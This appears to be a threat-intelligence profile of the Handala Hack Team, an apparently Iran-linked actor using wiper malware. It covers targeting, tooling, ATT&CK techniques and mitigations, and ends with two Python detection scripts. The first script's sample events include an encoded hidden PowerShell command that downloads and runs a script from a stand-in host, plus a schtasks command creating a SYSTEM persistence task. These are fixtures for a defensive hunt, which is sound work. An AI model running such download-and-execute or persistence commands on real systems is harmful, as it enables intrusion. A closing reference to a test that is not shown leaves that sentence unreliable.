Overview
The Handala Hack Team emerged in late 2023 and has since evolved into a disruptive and highly visible cyber threat actor, primarily targeting Israeli interests and organizations linked to them. Although the group publicly presents itself as a pro-Palestinian hacktivist collective, multiple intelligence assessments attribute its operations to Iran’s Ministry of Intelligence and Security (MOIS).

Handala operates across a wide range of online platforms, including Telegram, Tox, X (formerly Twitter), and underground forums, where it rapidly claims responsibility for cyber incidents and amplifies psychological impact. Its operations are characterized less by financial motivation and more by disruption, signaling, and reputational damage.

A defining trait of the group is its reliance on destructive malware (wipers) rather than ransomware. Instead of monetizing access, Handala focuses on permanently erasing data, disrupting operations, and, in some cases, exposing sensitive information to increase pressure on victims.
Emergence and Evolution
Handala first appeared in December 2023, initially conducting operations aligned with regional geopolitical tensions in the Middle East. Over time, the group has expanded both its technical capabilities and operational scope.

Its campaigns reflect coordination and planning consistent with state-aligned activity. The group has demonstrated the ability to:
- Maintain persistent access within target environments
- Conduct staged attacks combining reconnaissance, lateral movement, and destruction
- Synchronize cyber operations with geopolitical developments
A notable example of its evolution was Operation “HamsaUpdate,” where the group deployed Linux-targeting wiper malware disguised as legitimate software updates, indicating growing cross-platform capabilities.
Relationship to Other Threat Actors
Handala is widely believed to be part of a broader ecosystem of Iranian cyber operations. Intelligence reporting links it to clusters such as:
- Void Manticore
- MuddyWater
These overlaps include:
- Shared tooling and malware families
- Similar intrusion techniques and infrastructure usage
- Alignment in targeting priorities and messaging
This suggests Handala may function as a front-facing persona designed for public attribution and psychological operations, while more established threat clusters support underlying capabilities.
Targeting Profile
Handala’s operations are primarily focused on Israel, while also extending to organizations with business, political, or defense-related ties to the country, as well as to select Western entities, particularly in the United States.
Cyble has observed the actor focusing on industries where disruption has an outsized effect, including IT & ITES, government & law enforcement agencies, energy & utilities, healthcare, and manufacturing.

Additionally, the actor has claimed more than 100 victim organizations (some confirmed, others unverified) in Israel, the United States, the United Kingdom, the United Arab Emirates, and Iran.
Notably, even indirect connections, such as partnerships or acquisitions involving Israeli firms, have been enough to bring organizations within Handala’s scope of interest.
Malware and Tooling

- Handala Wiper: A destructive Windows-based malware designed to overwrite the Master Boot Record (MBR) and delete files across infected systems. It is often deployed at scale using centralized management mechanisms such as scheduled tasks and Group Policy.
- Hamsa Wiper: A Linux-focused wiper that masquerades as legitimate software updates. It incorporates delayed execution and system profiling to evade detection before initiating destructive actions. The malware can also transmit operational data back to attacker-controlled channels via Telegram.
- Hatef Wiper: A data destruction tool targeting critical system directories. It systematically removes files and reports execution metrics, such as system identity and deletion status, to operators in real time.
- Handala Loader: A supporting component used to deliver payloads and facilitate execution across compromised environments.
Cross-Platform Capabilities
Handala’s tooling demonstrates increasing maturity through:
- Support for both Windows and Linux environments
- Modular payload deployment
- Delivery through cloud-based endpoint management platforms (e.g., Microsoft Intune)
This flexibility enables the group to target diverse enterprise environments, including hybrid and cloud-based infrastructures.
Technical Behavior
Handala’s attack lifecycle is structured and deliberate, typically unfolding in multiple stages:
Initial Access
- Exploitation of exposed services (VPNs, web servers)
- Use of compromised credentials
- Phishing campaigns impersonating trusted software or institutions
Lateral Movement and Persistence
- Use of native administrative tools (“living off the land”)
- Deployment via scheduled tasks and remote management services
- Abuse of enterprise management platforms such as Microsoft Intune
Defense Evasion
- Obfuscation of payloads and scripts
- Sandbox and virtualization detection
- Concealment of execution windows and artifacts
Destructive Phase
- Deployment of wiper malware across endpoints
- Overwriting system components and deleting critical files
- In some cases, coordinated wiping of thousands of devices simultaneously
Impact Amplification
- Immediate public claims via social media
- Release or threat of releasing stolen data
- Psychological operations targeting victims and authorities
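The execution, persistence, and defense-evasion behaviors listed above (hidden PowerShell windows, encoded commands, scheduled-task deployment, and shells spawned by the WMI provider host) leave recognizable traces in process-creation telemetry. The following is an added example, not code from the original page or from Cyble, that hunts for those traces over a handful of constructed Sysmon Event ID 1 / Security 4688-style records. Hostnames, users, paths, and the download URL in the sample events are made up for the example; the technique IDs in the rules are the MITRE ATT&CK IDs for each behavior.

```python
"""Hunt constructed Windows process-creation events for the execution and
defense-evasion tradecraft described in the section above."""
import base64
import re
from dataclasses import dataclass

# Constructed sample events modelled on Sysmon EID 1 / Security 4688 fields.
# Hosts, users and the URL are invented for this example.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://updates.example/update.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},            # benign
    {"host": "WS-042", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",                  # WMI-spawned
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -enc " + _ENCODED},
    {"host": "FS-01", "user": "CORP\\svc_backup",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /create /tn "WinUpdateSync" /tr C:\ProgramData\upd.exe '
                     r'/sc once /st 03:00 /ru SYSTEM /f'},
    {"host": "FS-01", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /query /tn "Microsoft\Windows\Defrag\ScheduledDefrag"'},  # benign
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# -w hidden / -WindowStyle Hidden (T1564.003); PowerShell accepts unambiguous prefixes.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (T1027 + T1059.001).
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})")
SCHTASKS_CREATE = re.compile(r"(?i)schtasks(?:\.exe)?\s+/create\b")


@dataclass
class Finding:
    host: str
    user: str
    technique: str
    detail: str
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_powershell(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text, not UTF-8; decode it that way."""
    try:
        return base64.b64decode(b64).decode("utf-16-le", errors="replace")
    except ValueError:
        return "<undecodable>"


def hunt(events) -> list[Finding]:
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["command_line"]
        add = lambda tech, detail: findings.append(Finding(ev["host"], ev["user"], tech, detail, cmd))
        if image in ("powershell.exe", "pwsh.exe"):
            if HIDDEN_WINDOW.search(cmd):
                add("T1564.003", "PowerShell launched with a hidden window")
            m = ENCODED_CMD.search(cmd)
            if m:
                add("T1027", "encoded PowerShell command; decoded: " + decode_powershell(m.group(1)))
        if parent == "wmiprvse.exe" and image in SHELLS:
            add("T1047", "shell spawned by the WMI provider host (remote WMI execution)")
        if image == "schtasks.exe" and SCHTASKS_CREATE.search(cmd):
            level = "as SYSTEM" if re.search(r"(?i)/ru\s+SYSTEM", cmd) else "as a user"
            add("T1053.005", f"scheduled task created {level} from an interactive shell")
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.technique}: {f.detail}")
```

In production the rules would run against the SIEM's process-creation feed rather than an inline list; the decoded command line is kept in the finding because the base64 blob itself is useless to an analyst, and the SYSTEM-versus-user distinction on task creation is what separates routine software from the at-scale wiper rollout the section describes.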
Associated Threat Activity
Handala has been linked to several high-impact incidents, including attacks on Israeli infrastructure and international organizations.

One of the most notable campaigns involved the global medical technology firm Stryker Corporation, where the group claimed widespread system disruption and data exfiltration. While the full extent of the damage remains contested, the incident demonstrated Handala’s ability to affect large-scale enterprise environments.
The group has also been associated with:
- Data leaks involving sensitive personnel information
- Disruption of industrial and governmental systems
- Coordinated “hack-and-leak” operations
Moreover, following an FBI-led seizure of domains linked to the group and its alleged ties to Iran’s MOIS, Handala quickly re-established its online presence via new infrastructure and publicly acknowledged the takedown.
Operational Tradecraft
Handala relies heavily on stealth and system-native tools to execute operations.
Execution Techniques
- PowerShell and command-line interpreters
- Windows Management Instrumentation (WMI)
- Remote service execution mechanisms
Persistence Mechanisms
- Scheduled tasks
- Domain account creation
- Registry modifications
Defense Evasion
- File and command obfuscation
- Hidden execution windows
- Artifact concealment within legitimate system processes
These techniques map directly onto MITRE ATT&CK (see the technique list at the end of this report), and their consistent reuse across incidents indicates a structured, repeatable operational playbook rather than opportunistic hacktivism.
Strategic Assessment
Handala represents a hybrid threat actor, blending hacktivist messaging with state-aligned capabilities. Key characteristics include:
- Strong alignment with geopolitical objectives
- Emphasis on destruction over monetization
- Integration of cyber operations with information warfare
- Rapid adaptation to infrastructure disruptions (e.g., domain seizures)
The group’s ability to quickly rebuild infrastructure and maintain visibility suggests a resilient operational model supported by external resources.
Conclusion
Handala is a hybrid threat actor combining hacktivist messaging with state-aligned capabilities, prioritizing destructive impact, psychological operations, and geopolitical objectives over financial gain.

Its resilience, rapid infrastructure recovery, and coordinated campaigns indicate strong external support, making it a credible threat to organizations linked to Israel or its allies. To stay ahead of such actors, organizations can leverage Cyble for real-time, AI-driven threat intelligence, and schedule a demo to strengthen proactive defense.
Recommendations and Mitigation Strategies
- Maintain segmented and offline backups to mitigate destructive attacks.
- Enforce multi-factor authentication (MFA) across all access points.
- Monitor and restrict administrative tools and remote execution frameworks.
- Harden endpoint and cloud management platforms (e.g., Intune).
- Detect anomalous use of scripting environments such as PowerShell.
- Implement network segmentation to limit lateral movement.
- Leverage threat intelligence feeds for early detection of emerging campaigns.
MITRE ATT&CK Techniques Associated with the Handala Hack Team

- Windows Management Instrumentation (T1047 | Execution): Used WMI to execute malicious commands locally or remotely via DCOM (port 135) or WinRM (ports 5985/5986). Enabled discovery, remote execution, and lateral movement across systems.
- Command and Scripting Interpreter (T1059 | Execution): Leveraged PowerShell, cmd, Python, JavaScript, or other interpreters to run commands and payloads. Supported execution via initial access files, C2-delivered scripts, interactive shells, and remote services.
- Obfuscated Files or Information (T1027 | Defense Evasion): Encoded, encrypted, compressed, or split payloads to evade detection. Hid strings, required user interaction (e.g., passwords), and used command obfuscation to bypass security controls.
- Virtualization/Sandbox Evasion (T1497 | Defense Evasion/Discovery): Detected virtual or sandbox environments by checking system artifacts or user activity. Delayed execution, altered behavior, or avoided payload deployment when analysis environments were identified.
- Hide Artifacts (T1564 | Defense Evasion): Concealed files, directories, user accounts, and system activity using OS features or isolated environments to evade detection and forensic analysis.
- Hidden Window (T1564.003 | Defense Evasion): Executed processes with hidden windows (e.g., PowerShell hidden mode) to avoid user visibility. Used OS and scripting features to conceal malicious activity.
- OS Credential Dumping (T1003 | Credential Access): Extracted credentials (hashes or plaintext) from the OS or memory to enable lateral movement and access to restricted systems.
- Input Capture (T1056 | Credential Access/Collection): Captured user input through deceptive prompts or background monitoring to obtain credentials and sensitive information.
- Keylogging (T1056.001 | Credential Access/Collection): Logged keystrokes via API hooks, hardware access, registry changes, or drivers to capture credentials. Sometimes forced reauthentication (e.g., clearing cookies) to increase success.
- Unsecured Credentials (T1552 | Credential Access): Searched systems for credentials stored insecurely in plaintext files, configs, or application data.
- Credentials in Registry (T1552.002 | Credential Access): Queried Windows Registry (HKLM/HKCU) to locate stored credentials used by applications or for auto-logon.
- System Network Configuration Discovery (T1016 | Discovery): Collected network details such as IP, MAC, routes, and interfaces using tools like ipconfig, arp, nbtstat, and route to map the environment.
- System Location Discovery (T1614 | Discovery): Identified host geographic or regional info using timezone, language, keyboard settings, API calls, or IP geolocation to guide attack decisions.
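The WMI entry above notes that remote execution rides on DCOM (TCP 135) and WinRM (TCP 5985/5986), which is also the traffic behind the "remote service execution" and lateral-movement behaviors described earlier. One practical network-side control is to alert when a host that is not an approved administration point fans out to many peers on those ports within a short window. The following is an added example, not code from the original page or from Cyble, that implements that check over constructed flow records; the hostnames, the 10-minute window, the threshold of five distinct targets, and the allow-listed jump host are all assumptions for the example.

```python
"""Flag hosts fanning out over DCOM/WinRM to many peers in a short window,
a network-level indicator of WMI/WinRM lateral movement."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Ports named in the WMI entry of the ATT&CK list above.
REMOTE_EXEC_PORTS = {135: "DCOM/WMI", 5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)"}


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst: str
    dport: int


def _t(hhmm: str) -> datetime:
    return datetime(2025, 1, 1, int(hhmm[:2]), int(hhmm[3:]))


# Constructed flow records (all names invented for the example).
SAMPLE_FLOWS = [
    Flow(_t("01:00"), "WS-042", "SRV-09", 135),     # old, falls outside the window
    Flow(_t("02:10"), "WS-042", "SRV-01", 135),
    Flow(_t("02:11"), "WS-042", "SRV-02", 135),
    Flow(_t("02:12"), "WS-042", "SRV-03", 5985),
    Flow(_t("02:13"), "WS-042", "SRV-04", 135),
    Flow(_t("02:14"), "WS-042", "SRV-05", 135),     # fifth distinct target -> alert
    Flow(_t("02:15"), "WS-042", "SRV-06", 135),
    Flow(_t("02:16"), "WS-042", "SRV-07", 443),     # not a remote-execution port
    Flow(_t("02:20"), "WS-017", "SRV-01", 5985),    # two targets only: no alert
    Flow(_t("02:21"), "WS-017", "SRV-02", 5985),
] + [Flow(_t(f"02:{30 + i}"), "JUMP-01", f"SRV-0{i + 1}", 5985) for i in range(8)]  # admin jump host


def detect_fan_out(flows, window=timedelta(minutes=10), threshold=5, allowlist=frozenset()):
    """Return {src: {first_alert, targets, ports}} for sources that reached at least
    `threshold` distinct hosts on remote-execution ports within `window`."""
    by_src = defaultdict(list)
    for f in sorted(flows, key=lambda f: f.ts):
        if f.dport in REMOTE_EXEC_PORTS and f.src not in allowlist:
            by_src[f.src].append(f)

    alerts = {}
    for src, items in by_src.items():
        recent = deque()                       # sliding window of flows from this source
        for f in items:
            recent.append(f)
            while f.ts - recent[0].ts > window:
                recent.popleft()
            targets = {r.dst for r in recent}
            if len(targets) >= threshold and src not in alerts:
                alerts[src] = {"first_alert": f.ts,
                               "targets": sorted(targets),
                               "ports": sorted({r.dport for r in recent})}
    return alerts


if __name__ == "__main__":
    for src, info in detect_fan_out(SAMPLE_FLOWS, allowlist={"JUMP-01"}).items():
        print(src, info["first_alert"].strftime("%H:%M"), info["targets"],
              [REMOTE_EXEC_PORTS[p] for p in info["ports"]])
```

The allow-list is what keeps this usable: administration hosts legitimately fan out over WinRM, so the rule should fire on workstations and servers that never should. Dropping the allow-list (the second assertion in the test below) shows the jump host would otherwise trigger the same alert, which is exactly why "restrict administrative tools and remote execution frameworks" in the recommendations pairs with knowing which hosts are permitted to use them.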